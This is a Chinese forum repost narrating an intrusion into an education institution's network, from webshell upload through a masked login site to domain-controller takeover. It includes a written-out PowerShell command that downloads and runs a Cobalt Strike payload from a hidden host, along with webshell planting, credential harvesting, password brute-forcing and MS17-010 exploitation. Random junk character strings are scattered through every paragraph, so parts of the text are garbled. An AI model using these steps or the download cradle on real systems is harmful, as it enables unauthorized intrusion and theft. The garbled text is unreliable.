找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2095|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

7 r/ g9 q" D& | 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 2 X& T# a! F6 d; B1 x

& j. V! Y4 \' _8 s* X

! M6 h: Y1 N8 k1 p0 d  % P- J* P* v' r

( d/ \2 \+ c, Q3 l* R" W

* f& Z; c2 r6 w9 ]; R+ q 正文$ {) e" H0 c# i/ O

" x1 y3 G$ M/ i4 p6 ~; I* F

" P& G) W* ?. W: W6 f   7 P9 n- Z- Y! F# w g- U

. B, s! S" N& u, @. B6 |/ ]

/ t- ?+ v4 c1 {# g1 g3 ^8 C/ Z 目标:www.xxxx.com(一家教育机构)
7 V7 l3 U, c. c; i) E# D
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
, L) j: Y9 Q6 j' }, ]

2 M8 I5 Z0 g) A

- ^" Y0 b9 I# O: u vshapes=( ~! o. ?! X7 b/ r1 [& w; R9 E

' d( A# L( c L; l) C; t) P. u

- D5 X5 ~5 M) Q/ J! c6 K. T0 X 进行了简单的信息搜集
: x/ d0 ` M5 K: ]
& M1 A& Y( w D- _% D. q
. D% y7 o C" t2 n- h* H4 P+ @

) m1 b1 {9 {. N! ?/ V' z

. U* K7 E1 Q6 a7 `. a7 x, B 子域名搜集 " @7 d* t$ [/ M/ v% u# i

|+ n; @/ C- A( J0 c

/ S, h0 F0 l) h vshapes=# w3 K, n, H, h2 j& X& s: f

; x( u6 }" K4 G# N7 d. {8 }0 V

) L S* b4 ^: w) P h fofa找资产
. E4 c1 z2 A4 r2 X
2 M) U' U5 Z- k( a# f; v
9 D% P) F" n( B- q

/ ^; H8 k; }9 E# t! v

1 s/ F5 S2 W: F# i. H/ _ vshapes= / a! S8 R0 V9 d$ N% U- C5 G% n

3 ^. n7 L/ v* i9 \1 U

# w$ b. b1 h Z4 u" x4 q 一共七个资产。去重之后只有两个。
, R6 J% ^$ y, k1 z" F. v; R
% {3 |5 Q) o; p* X, A
+ X/ t7 Y1 Q3 a8 L: U' z$ P& o

. O5 Y/ f9 U+ u$ d3 K4 I. ]7 [, o- x

) I, q2 x% S P% r2 F' ] 目录探测3 S3 F' H4 o& U% `8 x% {+ F

" Y$ g" u" [ ^

1 P$ I; g+ d; h& ~! m, D# h$ y vshapes= . N# G- Z8 O4 Z$ P) x7 ~

/ i, W/ _* [! l- o4 B D# ]

6 ?" L: R) W6 [ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
3 m9 M. S8 D+ r. I5 H1 Q7 }
v7 j w; R' n
/ H2 B8 P7 E% h f/ }5 h. i

2 H' _4 U6 ]% N( f: f0 i, ~

: f# L! {& |/ S; o n6 x9 Y. H 我又尝试了通过修改返回包来绕过登录界面 1 o# o, {: H( b P: I

/ e+ {, ^, r) L; k! a% Q

, B: a/ V1 S3 i/ [- j% V vshapes=' d. D; d! r n8 D

/ |7 w+ ~3 a% B( c4 R; N0 F) k3 X$ c" t

! }. u( n" ~6 w, U& J6 ~ 还是不行,尝试注入无果 ' u2 ]$ D7 n0 d+ \

& o/ G( S M& i: `

& Y& Y5 t& D7 d3 U vshapes=4 z3 i/ q6 R% c9 r, \ K

; N- R! D$ u6 L( s, [+ Q

/ U0 C+ }" ?( d; V 不过我目录探测出了一处Spring信息泄露
+ G+ V5 Z- O& F! ] j* ~
: k9 l/ {7 @; n! V+ L$ `5 F1 r4 e: P
% B, @4 k& n) h& q2 l

$ F( Y/ [5 Q, q9 F

/ d* z; x; S& W( F; _7 E vshapes= $ m4 p2 R; M( I6 P0 \

, o- ^7 _$ p: W' e' R

7 p& W6 N! a, o 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 , H7 W. q6 O- T0 O% o" b) y; K

) o, u* R/ k" I! `4 Z4 G

" h' y; w4 c K vshapes= 5 r8 Y0 ]5 K6 T* O4 e0 |

7 B" }2 ^9 ^6 `' N! `+ _8 ]5 C

% @9 @: ^0 j- T' B 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 3 c& |# J2 P1 {& q' X! z

7 ^# u& W: u5 H

& l9 J, s6 ^3 E( V/ Y vshapes= " j+ T% H7 a: g8 A) V0 P% o+ s/ t

' \% c) G3 t8 ^9 Z& R& b7 G. n6 _+ u

2 @6 B: T1 \3 _ 获取有些师傅到这一步就手机抓包电脑测了。 Y; Z6 n5 @3 M* f

4 \5 j6 l: [9 q/ ~% y. X- }

0 d+ i* ~, U2 ^ Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。6 X0 m9 X& p0 }( E' u& n& h% Q

8 C( h* z; N! t* ^

5 T& K% T% D5 t( d$ W" K 其中在一个公众号发现了小程序,可以进行注册。 * X N$ @* w7 ]' f& j6 P

1 W9 r5 `+ f8 }7 P; ?

+ T; J0 \) A0 s6 T& H& j! C' ? 看到了头像上传,尝试上传获取WebShell * z9 j- X# D: O* [+ S1 D; E. E' G* {5 _

! q# u+ S0 u; x% J" }: ~3 w

5 O* U3 [0 e: b0 s7 N7 G vshapes=; @! _, R% I4 m* r

! G& H# p) g$ H* O

# A2 @% }- u+ r ~- u! z 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问- {/ X; t1 K+ S* i/ Q, u6 E

1 u) ~2 z3 w0 N5 d' w

6 A2 M+ T) k; k+ ?. O- W. m vshapes=, H6 s2 F; G: ` H/ E9 r

4 O8 V# ^# B' Z5 Y+ |% l) q

4 m- P( f0 b2 d! A2 x2 C 然后上了大马 : M3 `" ~' i" p, Q) K4 X

* Z+ o. }$ X; ?) J

7 Q& J( O1 O. x" |7 L7 N ] vshapes= + _& i! `' ~& m1 H$ h

/ B) C0 O1 I) W, @% v

$ j; I9 R* [- b4 E' _ vshapes= + A u1 Z* s# M6 Q, z7 U" \

! S3 V# A" Y2 K; C8 ~+ E

7 v& @# y0 d. u4 v 通过翻找文件发现数据库账号密码 $ h; y, g! @2 l8 g) f! {

9 F- [- C% a% Z) j5 y: o& J, \

& r, b, Z$ e4 p( c1 K4 m+ t: B5 j vshapes=5 g& q9 A" ?& I8 C% k, [/ N# e

; y' C5 [7 `( l. { o, Q5 m

2 K. v! `" v) [( u/ i* Z; }. z1 O --内网渗透/ \8 v5 V9 `7 M. c# P6 i

8 a, |! x' d' @' Z

; |, K6 _( f M/ X/ q9 _+ r 直接通过powershell执行 cs上线; [4 N6 |3 P1 y$ x- m

* l2 E) I+ |' h7 [# K# Q4 \& {: a

1 `2 ^, ?" D, w' h powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" 9 B0 Q3 ]9 \( V9 q. H. i# i

$ L, }, a* U: k4 o; h! M3 w2 @

) J2 |! i% }# \! v! ~ vshapes=) M; U }7 v" S

4 K) P- ? e2 d& y0 k

1 |& l8 C* y. m; c& h 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 - H# V$ O3 q F$ f1 K5 D3 E% g

% r$ ^ {8 R0 s6 ~8 ~

9 {. Y9 {. _# y: C8 I0 B vshapes= ( g% f& H b4 z$ f( ^0 B& n

& f5 U9 r7 ?3 v* i7 j% t9 c

% j C- L' C' i2 G; K8 W 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
& n! F4 r2 |$ i* U4 a$ b
2 V* B2 r' T( O
- f$ \8 h) y- i& G% t- v
; i+ A+ u1 x I# Q+ {5 }

, J$ }5 W& X; e" W o

1 T7 M3 J2 {8 b# F7 Q vshapes=! N# C! e4 w& ~

: i8 ~& K7 m e" ~9 R8 N8 }- e: y

2 z9 x& `8 I+ S, I" {/ } 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
2 c" [0 u! Q& _9 c4 L) B+ l$ }# D
1 x4 X% k" j6 d
; u! v4 t8 B/ N, k# p

- b `$ k! g7 D9 s' L9 D! k

. r2 d2 u b" ?" V vshapes= % k0 `- o, s: I, K8 S8 e

, t& F, }6 n5 c

0 s8 z1 P% L# q: C7 x0 }
; `* t; l, | x0 P0 q6 Z
( \$ j3 B# q) n( J8 J( r
* a0 @4 r6 I6 y# E* n8 I" G

( D) I8 O; c1 I; ?/ E

* L a' Q- d2 A5 F" [4 O2 O/ B  ( B6 B7 B. P* O% c8 I

" u/ m+ b' L9 o3 s2 e

9 q4 m( b9 i) u9 [+ _ 小结7 A" r9 b% N$ `' f4 n

$ H: u$ A1 F$ m; Q6 u

1 J) |3 R/ I; K  5 U3 Q7 n$ P4 n$ b$ E" [

6 V n: H3 ?) r( y- R- J- l

' Y8 G# k0 k) C( \ m* c | 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! 2 w1 T; a, \* T& T

7 {3 h, ~' T' y) L

3 w" @& h4 d; I" w: K! M   % \) d9 C { \ e" ^1 F n

3 {& l4 G6 e( g0 o$ v' V/ @- `% R
    % `/ f- W |4 d$ w5 P7 O
  • 6 v# v5 o3 C% B: ~. u   ) X8 v0 R3 M$ K
  • : x7 g2 R. O; ]6 b
  • 7 ?8 e2 w; N4 ~% {  + w5 q3 o3 S/ q
  • 6 Z- @, ?; ^0 ?
# M3 |8 Q. b b6 t* B/ o

5 R+ V* s# E. p1 W 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html $ b5 U) R9 t1 q; x2 B1 A) v4 |

s% a# S. k" }9 R& x! W

0 J& c& u1 Y+ W. R4 d( S! @0 `* M   . |5 H( I: Q" M$ l6 g

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表